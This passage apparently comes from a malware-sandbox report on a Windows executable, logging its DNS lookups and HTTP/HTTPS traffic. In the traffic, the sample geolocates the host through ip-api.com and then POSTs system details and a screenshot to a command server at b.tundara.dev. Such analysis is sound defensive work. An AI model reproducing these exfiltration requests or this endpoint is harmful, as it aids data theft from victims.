                                                                                                                            Nov 26, 2024 20:38:23.330077887 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.330153942 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330164909 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.330182076 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330188990 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.330197096 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330202103 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.330229044 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330229044 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330238104 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.330245972 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.330259085 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330271006 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.330348969 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330370903 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330421925 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330435991 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330456972 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330661058 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330759048 CET49728443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.371337891 CET4434972851.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.375333071 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.397710085 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.443336010 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.750319004 CET4434972851.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.750400066 CET4434972851.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.750694036 CET49728443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.751043081 CET49728443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.751056910 CET4434972851.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.751068115 CET49728443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.751071930 CET4434972851.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:24.676753044 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:24.676827908 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:24.676896095 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:28.273477077 CET4971380192.168.2.7208.95.112.1
                                                                                                                            Nov 26, 2024 20:38:28.273893118 CET49729443192.168.2.751.210.106.44

                                                                                                                            UDP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Nov 26, 2024 20:38:16.425585032 CET5942553192.168.2.71.1.1.1
                                                                                                                            Nov 26, 2024 20:38:16.569785118 CET53594251.1.1.1192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:18.126791000 CET5821453192.168.2.71.1.1.1
                                                                                                                            Nov 26, 2024 20:38:18.727670908 CET53582141.1.1.1192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:21.097464085 CET6261053192.168.2.71.1.1.1
                                                                                                                            Nov 26, 2024 20:38:21.332093954 CET53626101.1.1.1192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:33.906800032 CET5544553192.168.2.71.1.1.1
                                                                                                                            Nov 26, 2024 20:38:34.057097912 CET53554451.1.1.1192.168.2.7

                                                                                                                            DNS Queries

                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Nov 26, 2024 20:38:16.425585032 CET192.168.2.71.1.1.10xbff0Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                            Nov 26, 2024 20:38:18.126791000 CET192.168.2.71.1.1.10x5eb6Standard query (0)b.tundara.devA (IP address)IN (0x0001)false
                                                                                                                            Nov 26, 2024 20:38:21.097464085 CET192.168.2.71.1.1.10x8117Standard query (0)w.tundara.devA (IP address)IN (0x0001)false
                                                                                                                            Nov 26, 2024 20:38:33.906800032 CET192.168.2.71.1.1.10xdc6aStandard query (0)w.tundara.devA (IP address)IN (0x0001)false

                                                                                                                            DNS Answers

                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Nov 26, 2024 20:38:16.569785118 CET1.1.1.1192.168.2.70xbff0No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                            Nov 26, 2024 20:38:18.727670908 CET1.1.1.1192.168.2.70x5eb6No error (0)b.tundara.dev51.210.106.44A (IP address)IN (0x0001)false
                                                                                                                            Nov 26, 2024 20:38:21.332093954 CET1.1.1.1192.168.2.70x8117No error (0)w.tundara.dev51.210.106.44A (IP address)IN (0x0001)false
                                                                                                                            Nov 26, 2024 20:38:34.057097912 CET1.1.1.1192.168.2.70xdc6aNo error (0)w.tundara.dev51.210.106.44A (IP address)IN (0x0001)false

                                                                                                                            HTTP Request Dependency Graph

                                                                                                                            • b.tundara.dev
                                                                                                                            • w.tundara.dev
                                                                                                                            • ip-api.com

                                                                                                                            HTTP Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.749713208.95.112.1801408C:\Users\user\Desktop\file.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 26, 2024 20:38:16.700757027 CET96OUTGET /json/ HTTP/1.1
                                                                                                                            Host: ip-api.com
                                                                                                                            User-Agent: Go-http-client/1.1
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            Nov 26, 2024 20:38:17.804083109 CET482INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 26 Nov 2024 19:38:17 GMT
                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                            Content-Length: 305
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            X-Ttl: 60
                                                                                                                            X-Rl: 44
                                                                                                                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 7d
                                                                                                                            Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.75"}
                                                                                                                            Nov 26, 2024 20:38:17.805345058 CET96OUTGET /json/ HTTP/1.1
                                                                                                                            Host: ip-api.com
                                                                                                                            User-Agent: Go-http-client/1.1
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            Nov 26, 2024 20:38:18.125679970 CET482INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 26 Nov 2024 19:38:17 GMT
                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                            Content-Length: 305
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            X-Ttl: 59
                                                                                                                            X-Rl: 43
                                                                                                                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 7d
                                                                                                                            Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.75"}


                                                                                                                            HTTPS Proxied Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.74972051.210.106.444431408C:\Users\user\Desktop\file.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-26 19:38:20 UTC338OUTPOST /tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi1DQzU2LTFBNTktOTc3OS1GQjhDQkZBMUUyOUQ= HTTP/1.1
                                                                                                                            Host: b.tundara.dev
                                                                                                                            User-Agent: Go-http-client/1.1
                                                                                                                            Content-Length: 573
                                                                                                                            Content-Type: multipart/form-data; boundary=55886a13b9171df724d2ad867f316f6cc583361f023996dbc4ae71c10002
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            2024-11-26 19:38:20 UTC573OUTData Raw: 2d 2d 35 35 38 38 36 61 31 33 62 39 31 37 31 64 66 37 32 34 64 32 61 64 38 36 37 66 33 31 36 66 36 63 63 35 38 33 33 36 31 66 30 32 33 39 39 36 64 62 63 34 61 65 37 31 63 31 30 30 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 79 73 74 65 6d 64 61 74 61 22 0d 0a 0d 0a 7b 22 55 73 65 72 6e 61 6d 65 22 3a 22 66 72 6f 6e 74 64 65 73 6b 22 2c 22 43 6f 6d 70 75 74 65 72 4e 61 6d 65 22 3a 22 46 52 4f 4e 54 44 45 53 4b 2d 50 43 22 2c 22 4f 53 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 22 2c 22 43 50 55 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 47 50 55 22
                                                                                                                            Data Ascii: --55886a13b9171df724d2ad867f316f6cc583361f023996dbc4ae71c10002Content-Disposition: form-data; name="systemdata"{"Username":"user","ComputerName":"user-PC","OS":"Microsoft Windows 10 Pro","CPU":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","GPU"
                                                                                                                            2024-11-26 19:38:21 UTC188INHTTP/1.1 200 OK
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000
                                                                                                                            Content-Length: 2
                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                            Date: Tue, 26 Nov 2024 19:38:20 GMT
                                                                                                                            Server: Caddy
                                                                                                                            Connection: close
                                                                                                                            2024-11-26 19:38:21 UTC2INData Raw: 22 22
                                                                                                                            Data Ascii: ""


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.74972951.210.106.444431408C:\Users\user\Desktop\file.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-26 19:38:23 UTC341OUTPOST /tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi1DQzU2LTFBNTktOTc3OS1GQjhDQkZBMUUyOUQ= HTTP/1.1
                                                                                                                            Host: b.tundara.dev
                                                                                                                            User-Agent: Go-http-client/1.1
                                                                                                                            Content-Length: 437402
                                                                                                                            Content-Type: multipart/form-data; boundary=d811583238ffff5cd4747165f3ed0953225391cced4601799c47e9abb75e
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            2024-11-26 19:38:23 UTC845OUTData Raw: 2d 2d 64 38 31 31 35 38 33 32 33 38 66 66 66 66 35 63 64 34 37 34 37 31 36 35 66 33 65 64 30 39 35 33 32 32 35 33 39 31 63 63 65 64 34 36 30 31 37 39 39 63 34 37 65 39 61 62 62 37 35 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6a 73 6f 6e 22 0d 0a 0d 0a 0d 0a 2d 2d 64 38 31 31 35 38 33 32 33 38 66 66 66 66 35 63 64 34 37 34 37 31 36 35 66 33 65 64 30 39 35 33 32 32 35 33 39 31 63 63 65 64 34 36 30 31 37 39 39 63 34 37 65 39 61 62 62 37 35 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5b 5d 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 73 63 72 65 65 6e 73 68 6f 74 5f 30 2e 70 6e 67 22 0d 0a 43 6f
                                                                                                                            Data Ascii: --d811583238ffff5cd4747165f3ed0953225391cced4601799c47e9abb75eContent-Disposition: form-data; name="json"--d811583238ffff5cd4747165f3ed0953225391cced4601799c47e9abb75eContent-Disposition: form-data; name="file[]"; filename="screenshot_0.png"Co
                                                                                                                            2024-11-26 19:38:23 UTC2372OUTData Raw: 91 75 85 91 97 33 eb c5 1c db d0 ee 8e 4e b0 38 52 0c 78 7d 77 19 76 63 8c 8c a1 0c 02 a6 00 97 f3 74 4b 0b 72 da 20 4e 54 2f f2 52 e4 4f 1e 01 1e 2e 19 9c 34 4d b1 c0 8a d9 1c 8f 6d 79 3c cb b2 a4 94 34 4d 45 1f 0c a9 28 50 4c 4d 96 61 e1 e1 9d 20 6b 40 ee 9b d7 52 69 62 93 aa e3 a5 38 e7 26 93 49 9e a6 ab e7 9d 87 33 b9 41 f4 14 57 f1 f0 ca 9f 68 3f 49 12 63 4c d1 60 a9 00 c6 0d 83 69 bd a5 22 1a 1a 63 d2 34 1d 0e 87 49 92 8c 46 a3 d6 42 ad fb 25 9f b3 49 8a 79 c4 ad 65 4c d4 f3 8b 0f 32 5c 59 29 a2 24 3f a4 b2 c2 65 b4 e5 21 c2 72 e2 1b a5 69 9a 95 43 9d 24 89 dc 57 46 03 bf 9b fc 2f bf 48 31 8c fc 94 e1 f5 a5 9e 1a f5 c6 2b df 5d a9 2c 12 4c 4d 6c ab 06 65 9c 07 83 41 92 24 d2 3b e9 ac f4 48 de 00 d2 b2 5c 28 fa 17 3a d7 63 55 8c 46 f8 ad b4 94 a5 ec
                                                                                                                            Data Ascii: u3N8Rx}wvctKr NT/RO.4Mmy<4ME(PLMa k@Rib8&I3AWh?IcL`i"c4IFB%IyeL2\Y)$?e!riC$WF/H1+],LMleA$;H\(:cUF
                                                                                                                            2024-11-26 19:38:23 UTC538OUTData Raw: ea 74 d0 92 84 b6 cc 4a 6b 15 16 52 a8 55 4e e0 18 5a b4 8f ac d1 be cd 85 19 33 55 00 89 cb f3 34 0e c6 75 2e 5c 8e 8c ed f2 2c 55 b0 93 17 bf 8b ac 5a 8a 2a cd 2f 07 81 c7 71 3c 2e 8b f4 60 88 00 c8 2b ec 91 37 e4 a1 88 94 a8 51 8c fa 60 30 80 cb 37 3f 02 b8 23 ba cc 34 be 2c 24 11 21 fd ca 64 48 16 4e b0 58 7b 0c d1 d5 74 73 3a 28 71 d3 95 a4 4a 1c 6f cc 0b 18 5d 83 4f b5 22 4e 7d b2 d4 8f a4 75 ce 0d 87 43 3c dd ec 0c cc 64 b2 c2 de 3c 7d 0d 81 e9 74 4c 7b bb 08 96 55 78 5e 06 9f 53 ac 01 51 2b 46 d4 b4 9d c0 79 46 40 ea fa 49 bf 9d d5 b4 30 fa a5 06 84 cb 35 f9 cf 5d 5a 25 d5 b3 6c 95 90 64 6f b0 41 48 a2 3b 61 7a b3 12 18 33 33 9c 65 d9 fa 99 33 c9 60 00 33 87 6f ee e1 f4 69 e2 e4 6f ed ef 9e d8 99 ad a1 eb f0 32 9a 51 91 0d 29 9d e6 86 bd ae 3e 3b
                                                                                                                            Data Ascii: tJkRUNZ3U4u.\,UZ*/q<.`+7Q`07?#4,$!dHNX{ts:(qJo]O"N}uC<d<}tL{Ux^SQ+FyF@I05]Z%ldoAH;az33e3`3oio2Q)>;
                                                                                                                            2024-11-26 19:38:23 UTC4744OUTData Raw: cf 84 99 5b c6 d8 ba 60 72 4d e1 e1 76 48 ba a3 6c 0a 7e 8f 70 a3 38 b1 0a cd 62 c6 b9 66 2c bc 73 15 74 69 86 2e 77 fe 20 97 53 33 04 9f 8c 92 30 9c 4e 59 95 fc f5 9f 2f 18 02 90 5b 48 81 19 f1 6a 96 1c bc a2 a7 58 1f 84 e7 57 ab 85 b3 13 2b b7 5e 55 5f 5a 3e 4b bd 59 69 bc 00 db e5 55 59 96 89 a3 b2 ac 52 5c 28 2b d8 e7 45 45 b1 24 49 06 83 c1 68 34 12 fc 29 3a 8c d6 27 d0 47 80 13 fb b1 2b 52 9a 59 4d 9e 08 50 91 ac 89 aa 74 05 13 89 8c e7 ca ca 4a 56 42 6d 5c ce fe fc a0 bb a5 a7 15 b9 3a 18 a8 f1 2f c0 5e 14 03 d3 82 28 1e 0c 06 d2 14 e2 9f b1 78 38 1b 36 af 16 4b c2 a9 b0 40 1a 0b e0 1c 94 32 1a 8d 98 aa c5 55 ce b9 d8 58 2e 37 85 5b 70 08 00 9e 20 ac 07 b5 1a 91 72 5c 3d 8f bc 27 51 ef 19 eb 2d fe fa 70 cb 16 c0 3e ff ca 10 56 79 0a f8 cf ff 82 a5
                                                                                                                            Data Ascii: [`rMvHl~p8bf,sti.w S30NY/[HjXW+^U_Z>KYiUYR\(+EE$Ih4):'G+RYMPtJVBm\:/^(x86K@2UX.7[p r\='Q-p>Vy
                                                                                                                            2024-11-26 19:38:23 UTC5930OUTData Raw: b5 f3 ac a4 eb e3 61 f9 b4 0f ca 3a 58 89 38 9e 94 b9 b5 37 9d 04 cb 18 23 48 d8 18 73 fe 4a fc a2 ab 2e 9d 86 13 c6 5a 95 fe fa 5f 3c f5 92 7d 4f b9 64 75 5f ba 76 f8 be 07 3e fc e9 af 7d f6 cc 7e 63 3a aa d4 76 ba 96 2d 6a 83 c2 78 36 33 e9 31 9b 1c 3c ff b2 7f 7e e6 e8 ad d9 a9 43 c6 58 67 eb 40 5f 71 77 76 12 d5 e2 c4 21 a9 8c 09 46 72 ac 3d 2c f6 0b b7 45 9f fa 78 fe 8c 67 47 6f 7b 4b fe f2 57 4d 75 cd 81 83 f9 cb 5f 15 fd d2 eb 9f fd 0f 9f dc 72 fd 96 72 ae 8a e0 81 ae 2c ca 1b ee 68 37 1f 74 10 06 24 f2 52 de 4c bb 4b 59 ca 39 2f fe b3 99 97 15 18 4c ae 19 fb 7e 09 c2 ce 1e 80 d7 a5 00 73 d1 d3 5c a2 9c 63 7b fa c5 e4 64 50 79 f5 27 07 b5 f6 6b d5 f2 77 ad 8f 60 57 8d 8d 32 dc 2f 8d 17 94 18 c0 f6 5e 69 59 c6 66 bc d5 ae 73 1f 07 9c bd 7d 0f 0e e5
                                                                                                                            Data Ascii: a:X87#HsJ.Z_<}Odu_v>}~c:v-jx631<~CXg@_qwv!Fr=,ExgGo{KWMu_rr,h7t$RLKY9/L~s\c{dPy'kw`W2/^iYfs}
                                                                                                                            2024-11-26 19:38:23 UTC7116OUTData Raw: 5f f9 a5 f3 85 6c 23 f0 b5 e5 ea 47 58 ff 25 c3 19 2b f4 ce b0 90 85 2f f4 2d 77 2a 43 15 f3 f3 ea fd c3 61 05 ca 2f 9a 5d 91 bd d8 f8 5c 4d 28 7b 5c 63 84 d5 f3 c5 23 56 95 e9 ca 27 41 43 49 d7 a4 6c 0a 00 8b ac a5 46 d0 af 31 e6 d6 a3 f9 8d c6 ec 4f a2 a7 5d e4 3e 7b 9f bd f5 68 75 fc ea 87 c5 f3 35 fe f5 ec fc 99 af 91 1e 2e ec 87 b3 4d f9 82 d1 35 28 35 6e 6c 9d 0d cb 48 ca 04 5b 27 7f 36 54 06 69 af 49 fc 9f 7f 3a fa ad b7 b8 27 5e 25 7f 66 3f f1 b3 da bd f9 c0 c1 ec e7 df 98 fd fc 1b ed df 7c a2 f8 f3 f2 b3 aa 3e f0 8e ef 02 77 4a ce d6 8e ef 92 3d 3d 1f 39 2b c7 19 32 37 74 e9 1f 99 b3 7e dc 76 83 ec d4 20 2f d6 4e ba 99 5e 74 6d 10 7b ee 35 d3 71 1f 3a 4e 73 17 ff 9c 68 50 e1 10 e5 40 8b b4 bd 50 a3 ba 97 57 57 59 44 b2 04 ab 9d ba da 3e f2 7e d7
                                                                                                                            Data Ascii: _l#GX%+/-w*Ca/]\M({\c#V'ACIlF1O]>{hu5.M5(5nlH['6TiI:'^%f?|>wJ==9+27t~v /N^tm{5q:NshP@PWWYD>~
                                                                                                                            2024-11-26 19:38:23 UTC8302OUTData Raw: c7 3e f6 a7 7f fa a7 37 dc 70 83 1c d9 29 17 e8 3d 27 bb 36 cb eb 02 65 8e 12 9d be 2c d9 e0 99 96 ca 5e 59 57 4b 3d 67 55 23 78 7c e7 35 5b 4a 29 fe a6 9c 3f 34 6f c2 9a 31 0b e2 2e 1f 2d f8 80 59 dd 2e e8 da 67 e9 1c 55 2e 55 35 a2 78 5a f9 8c 22 ab 3e 49 9b 4d 26 36 14 03 1c ce ba 5c bb 04 33 17 5a 5c 48 f4 97 a2 49 59 4f de 10 5b db 99 ed 96 71 ac 3f 26 53 4a 57 70 b5 47 78 6a f4 c5 15 74 ca 24 5b 03 9e 53 76 f3 56 5b 7f f9 97 43 85 55 bd 22 80 de 0d 69 7c c6 c0 3c b3 05 f0 cb d3 95 95 15 49 83 2c 29 97 8c 31 eb eb eb 92 8a 49 25 0d 2a f3 95 59 4e ed ab 8c 05 6a 9d 14 fa 18 0b 50 cd 14 9f 62 92 89 99 d4 af 53 c6 90 2a a4 33 c8 a9 02 97 2a 36 1e 85 8e 78 b2 fc 25 0d 07 6f 41 92 7e e5 21 75 23 f5 08 8b 45 00 73 0a 78 ec 83 2b 46 8c 42 a1 23 d7 17 67 fc
                                                                                                                            Data Ascii: >7p)='6e,^YWK=gU#x|5[J)?4o1.-Y.gU.U5xZ">IM&6\3Z\HIYO[q?&SJWpGxjt$[SvV[CU"i|<I,)1I%*YNjPbS*3*6x%oA~!u#Esx+FB#g
                                                                                                                            2024-11-26 19:38:23 UTC6676OUTData Raw: df 74 e3 4b ec b3 5e 72 ed 3b 47 af be f1 3b 9e 51 9c fc d5 fe 83 f6 17 3e f3 bc 97 3d e3 15 77 de 62 ee fc 5a 75 f0 5f bf d6 be fc 37 9e ff 89 e3 65 83 df ac af 1d bf fa c6 c7 3c f3 f0 ed e5 b8 b5 49 d7 02 00 97 a3 fa ad db cd d1 c3 e5 7f e5 9f 77 c9 8d 0e 7f ed 92 7f 75 f3 65 b7 98 c3 b7 95 ff 1d a6 af ce 98 43 b7 98 3b 6f 79 c5 8d 2f 7a c1 a7 df 6e 7f f6 43 d5 1d 7f e4 25 f6 ba 97 d8 ff e7 33 cf 7b d9 3f 79 79 a5 ed 9a 39 72 9b b9 ff 70 31 3b 82 7e cd be af be f9 79 df f5 87 af 8d fe f7 37 46 2f fb 4d fb 9b e6 45 4f 3f f6 d6 0f 7f e6 b1 0f 39 65 ee ba 5d ee f5 8a c7 3d e2 83 1f 7e 8f f9 f2 2d e6 51 4f 74 ff 6e df 9b 6e 7a ad fd fe d7 da ef ff ef 1f f8 ff d9 7b 17 70 cb ae aa 4c 74 ce b5 f6 de a7 1e 49 3d 48 05 82 92 3a 15 20 41 02 a9 44 3f 68 9a 04 02
                                                                                                                            Data Ascii: tK^r;G;Q>=wbZu_7e<IwueC;oy/znC%3{?yy9rp1;~y7F/MEO?9e]=~-QOtnnz{pLtI=H: AD?h
                                                                                                                            2024-11-26 19:38:23 UTC10674OUTData Raw: f0 c2 1a 60 84 7d 49 0c 95 8f d5 8b 51 5a df ae 81 32 2a 75 dc 52 30 d9 f3 53 33 75 89 91 fb e6 72 eb ef 9a b6 fb ba d9 ce 39 1f 0c 58 02 60 4e f4 22 48 12 43 03 a0 5e 8e 80 10 ac d8 8f a6 26 84 f0 c1 5d 63 8b 61 c8 aa be d7 b4 17 83 85 b8 4f f5 90 b5 b6 73 c5 bd 6c f1 6b ee f0 4f 24 d3 04 9b 14 12 b4 da da 3e 1b 99 4f 4d 42 a2 26 f9 1b ba 7f 30 a0 74 53 a0 6a 4a 37 95 26 e2 69 8c 81 03 10 8a 50 6b 7b 9d 2e 87 7a 22 c5 8a 30 3f a8 19 e7 5c af d3 45 4c 88 05 46 26 27 40 0b 4c d3 4a f3 21 ea bd 4c c0 35 85 fc 43 68 40 11 b3 5d 63 54 64 08 99 3e ad 43 29 2b 12 05 07 cc e6 72 dd 1e 91 36 36 ba d9 13 e9 70 74 3a 2b 6e 6a 81 eb 5c 95 99 a9 6c 64 87 ea e5 84 43 d4 59 0e fe c4 85 63 7c 2c 6c 18 e9 b3 63 65 68 2e fa 93 e2 36 d1 ea a3 0c 40 3e 82 77 97 bd be c5 7a
                                                                                                                            Data Ascii: `}IQZ2*uR0S3ur9X`N"HC^&]caOslkO$>OMB&0tSjJ7&iPk{.z"0?\ELF&'@LJ!L5Ch@]cTd>C)+r66pt:+nj\ldCYc|,lceh.6@>wz
                                                                                                                            2024-11-26 19:38:23 UTC11860OUTData Raw: a0 35 96 cc 86 06 bd 04 b0 3d 88 bd d1 30 44 17 e0 28 74 3a 9d c1 30 c3 69 19 85 d3 62 dd 45 5d 2a f4 8d 5a 70 e6 eb 27 24 2a 8d 35 20 b4 24 a6 1c a9 88 9b a4 3f 70 ea 26 52 e3 e9 08 80 4f f3 f7 f4 a2 12 3d f8 81 9f e9 21 5b 00 71 3a 6d 52 cf 1f 58 bd 3f c8 1d ca bf ff ab 85 64 8c 4d 52 93 fa a0 59 36 37 b9 75 2e f3 b1 1b 33 79 12 63 0d 60 e0 99 cc 64 26 33 59 53 92 37 67 56 3b 25 a5 e9 7d 3d 2e 8c 24 d3 aa 75 e1 85 b2 1c af 95 8a 12 a7 a6 f9 80 32 a6 0e 8c d1 3d 6f 94 d2 c4 9f 08 c3 72 eb 5a ba 10 45 7a 2c 51 ea 5e 73 fb b6 cc 04 1b 6d 12 92 87 94 06 c9 78 48 9c c0 f6 17 71 9d d8 2b b3 97 69 94 9c 64 50 c7 2e b2 9c 37 25 8c 63 7d bf 11 08 a5 dc 21 bd ac 5d 79 b9 19 22 0f 30 c3 89 90 fe a7 ee b5 cb bb f0 a6 4d bf 86 1f 98 0b 07 03 f3 b2 d5 40 90 84 8c 43
                                                                                                                            Data Ascii: 5=0D(t:0ibE]*Zp'$*5 $?p&RO=![q:mRX?dMRY67u.3yc`d&3YS7gV;%}=.$u2=orZEz,Q^smxHq+idP.7%c}!]y"0M@C
                                                                                                                            2024-11-26 19:38:24 UTC188INHTTP/1.1 200 OK
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000
                                                                                                                            Content-Length: 2
                                                                                                                            Content-Type: application/json; charset=utf-8
